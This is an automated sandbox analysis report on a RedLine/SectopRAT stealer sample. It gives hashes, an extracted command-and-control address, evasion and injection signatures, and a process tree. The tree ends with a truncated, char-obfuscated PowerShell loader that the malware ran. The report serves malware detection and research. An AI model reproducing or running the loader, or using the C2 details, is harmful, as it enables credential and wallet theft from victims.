Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 02:18
Static task
static1
Behavioral task
behavioral1
Sample
234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe
Resource
win7-20241010-en
General
-
Target
234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe
-
Size
1.1MB
-
MD5
142727883c537e287bae329e5a2e0ce8
-
SHA1
981eaaaba35b326a5dbe386cc5a02adeb52447e7
-
SHA256
234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7
-
SHA512
e557519293c0518f5df61d77b42a1f2b4ee58c1bb33ae3db5b7c2da4754bf54f652e51f2e437b138fb62e6750b6caa2c882332ef9b86713f9c8a62566a821212
-
SSDEEP
24576:1MOjO8wmd7hUjBGna1qIWFLISsSaYEbJgEK8LFYUs:1MOjO857CjJuLI1lyEfx
Malware Config
Extracted
redline
iShop
venom.underground-cheat.com:1337
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4788-1093-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/4788-1093-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 464 created 3532 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 56 PID 2024 created 616 2024 powershell.EXE 5 -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 1984 svchost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 2024 powershell.EXE -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 464 set thread context of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 2024 set thread context of 4728 2024 powershell.EXE 104 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 55 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 28 Nov 2024 02:20:00 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732760399" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 4788 InstallUtil.exe 4788 InstallUtil.exe 2024 powershell.EXE 2024 powershell.EXE 2024 powershell.EXE 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe 4728 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe Token: SeDebugPrivilege 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe Token: SeDebugPrivilege 4788 InstallUtil.exe Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 4728 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1704 svchost.exe Token: SeIncreaseQuotaPrivilege 1704 svchost.exe Token: SeSecurityPrivilege 1704 svchost.exe Token: SeTakeOwnershipPrivilege 1704 svchost.exe Token: SeLoadDriverPrivilege 1704 svchost.exe Token: SeSystemtimePrivilege 1704 svchost.exe Token: SeBackupPrivilege 1704 svchost.exe Token: SeRestorePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeSystemEnvironmentPrivilege 1704 svchost.exe Token: SeUndockPrivilege 1704 svchost.exe Token: SeManageVolumePrivilege 1704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1704 svchost.exe Token: SeIncreaseQuotaPrivilege 1704 svchost.exe Token: SeSecurityPrivilege 1704 svchost.exe Token: SeTakeOwnershipPrivilege 1704 svchost.exe Token: SeLoadDriverPrivilege 1704 svchost.exe Token: SeSystemtimePrivilege 1704 svchost.exe Token: SeBackupPrivilege 1704 svchost.exe Token: SeRestorePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeSystemEnvironmentPrivilege 1704 svchost.exe Token: SeUndockPrivilege 1704 svchost.exe Token: SeManageVolumePrivilege 1704 svchost.exe Token: SeAuditPrivilege 2724 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1704 svchost.exe Token: SeIncreaseQuotaPrivilege 1704 svchost.exe Token: SeSecurityPrivilege 1704 svchost.exe Token: SeTakeOwnershipPrivilege 1704 svchost.exe Token: SeLoadDriverPrivilege 1704 svchost.exe Token: SeSystemtimePrivilege 1704 svchost.exe Token: SeBackupPrivilege 1704 svchost.exe Token: SeRestorePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeSystemEnvironmentPrivilege 1704 svchost.exe Token: SeUndockPrivilege 1704 svchost.exe Token: SeManageVolumePrivilege 1704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1704 svchost.exe Token: SeIncreaseQuotaPrivilege 1704 svchost.exe Token: SeSecurityPrivilege 1704 svchost.exe Token: SeTakeOwnershipPrivilege 1704 svchost.exe Token: SeLoadDriverPrivilege 1704 svchost.exe Token: SeSystemtimePrivilege 1704 svchost.exe Token: SeBackupPrivilege 1704 svchost.exe Token: SeRestorePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeSystemEnvironmentPrivilege 1704 svchost.exe Token: SeUndockPrivilege 1704 svchost.exe Token: SeManageVolumePrivilege 1704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1704 svchost.exe Token: SeIncreaseQuotaPrivilege 1704 svchost.exe Token: SeSecurityPrivilege 1704 svchost.exe Token: SeTakeOwnershipPrivilege 1704 svchost.exe Token: SeLoadDriverPrivilege 1704 svchost.exe Token: SeSystemtimePrivilege 1704 svchost.exe Token: SeBackupPrivilege 1704 svchost.exe Token: SeRestorePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 464 wrote to memory of 4788 464 234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe 96 PID 4788 wrote to memory of 1984 4788 InstallUtil.exe 101 PID 4788 wrote to memory of 1984 4788 InstallUtil.exe 101 PID 4788 wrote to memory of 1984 4788 InstallUtil.exe 101 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 2024 wrote to memory of 4728 2024 powershell.EXE 104 PID 4728 wrote to memory of 616 4728 dllhost.exe 5 PID 4728 wrote to memory of 672 4728 dllhost.exe 7 PID 4728 wrote to memory of 948 4728 dllhost.exe 12 PID 4728 wrote to memory of 316 4728 dllhost.exe 13 PID 4728 wrote to memory of 448 4728 dllhost.exe 14 PID 4728 wrote to memory of 1028 4728 dllhost.exe 15 PID 4728 wrote to memory of 1040 4728 dllhost.exe 16 PID 4728 wrote to memory of 1068 4728 dllhost.exe 17 PID 4728 wrote to memory of 1204 4728 dllhost.exe 19 PID 4728 wrote to memory of 1212 4728 dllhost.exe 20 PID 4728 wrote to memory of 1316 4728 dllhost.exe 21 PID 4728 wrote to memory of 1324 4728 dllhost.exe 22 PID 4728 wrote to memory of 1372 4728 dllhost.exe 23 PID 4728 wrote to memory of 1472 4728 dllhost.exe 24 PID 4728 wrote to memory of 1480 4728 dllhost.exe 25 PID 4728 wrote to memory of 1492 4728 dllhost.exe 26 PID 4728 wrote to memory of 1508 4728 dllhost.exe 27 PID 4728 wrote to memory of 1664 4728 dllhost.exe 28 PID 4728 wrote to memory of 1724 4728 dllhost.exe 29 PID 4728 wrote to memory of 1756 4728 dllhost.exe 30 PID 4728 wrote to memory of 1832 4728 dllhost.exe 31 PID 4728 wrote to memory of 1840 4728 dllhost.exe 32 PID 4728 wrote to memory of 2044 4728 dllhost.exe 33 PID 4728 wrote to memory of 1180 4728 dllhost.exe 34 PID 4728 wrote to memory of 1692 4728 dllhost.exe 35 PID 4728 wrote to memory of 1704 4728 dllhost.exe 36 PID 4728 wrote to memory of 2032 4728 dllhost.exe 37 PID 4728 wrote to memory of 2156 4728 dllhost.exe 38 PID 4728 wrote to memory of 2256 4728 dllhost.exe 40 PID 4728 wrote to memory of 2432 4728 dllhost.exe 41 PID 4728 wrote to memory of 2536 4728 dllhost.exe 42 PID 4728 wrote to memory of 2544 4728 dllhost.exe 43 PID 4728 wrote to memory of 2668 4728 dllhost.exe 44 PID 4728 wrote to memory of 2724 4728 dllhost.exe 45 PID 4728 wrote to memory of 2736 4728 dllhost.exe 46 PID 4728 wrote to memory of 2756 4728 dllhost.exe 47 PID 4728 wrote to memory of 2772 4728 dllhost.exe 48 PID 4728 wrote to memory of 2828 4728 dllhost.exe 49 PID 4728 wrote to memory of 2852 4728 dllhost.exe 50 PID 4728 wrote to memory of 3060 4728 dllhost.exe 51 PID 4728 wrote to memory of 2140 4728 dllhost.exe 52 PID 4728 wrote to memory of 1048 4728 dllhost.exe 53 PID 4728 wrote to memory of 3428 4728 dllhost.exe 55 PID 4728 wrote to memory of 3532 4728 dllhost.exe 56 PID 4728 wrote to memory of 3640 4728 dllhost.exe 57
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bbf3d68d-a298-44e1-b9aa-c19bb4b24a48}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1204
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dgpMGpVmbvjl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LNEOyGRNYZYrwR,[Parameter(Position=1)][Type]$RaIaFYraCg)$jwCbMRxwNFS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$jwCbMRxwNFS.DefineConstructor('RT'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'Name'+[Char](44)+''+[Char](72)+'ideB'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$LNEOyGRNYZYrwR).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+'e'+'d');$jwCbMRxwNFS.DefineMethod(''+'I'+''+'n'+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ubli'+[Char](99)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+'ewS'+'l'+''+[Char](111)+'t'+','+''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$RaIaFYraCg,$LNEOyGRNYZYrwR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+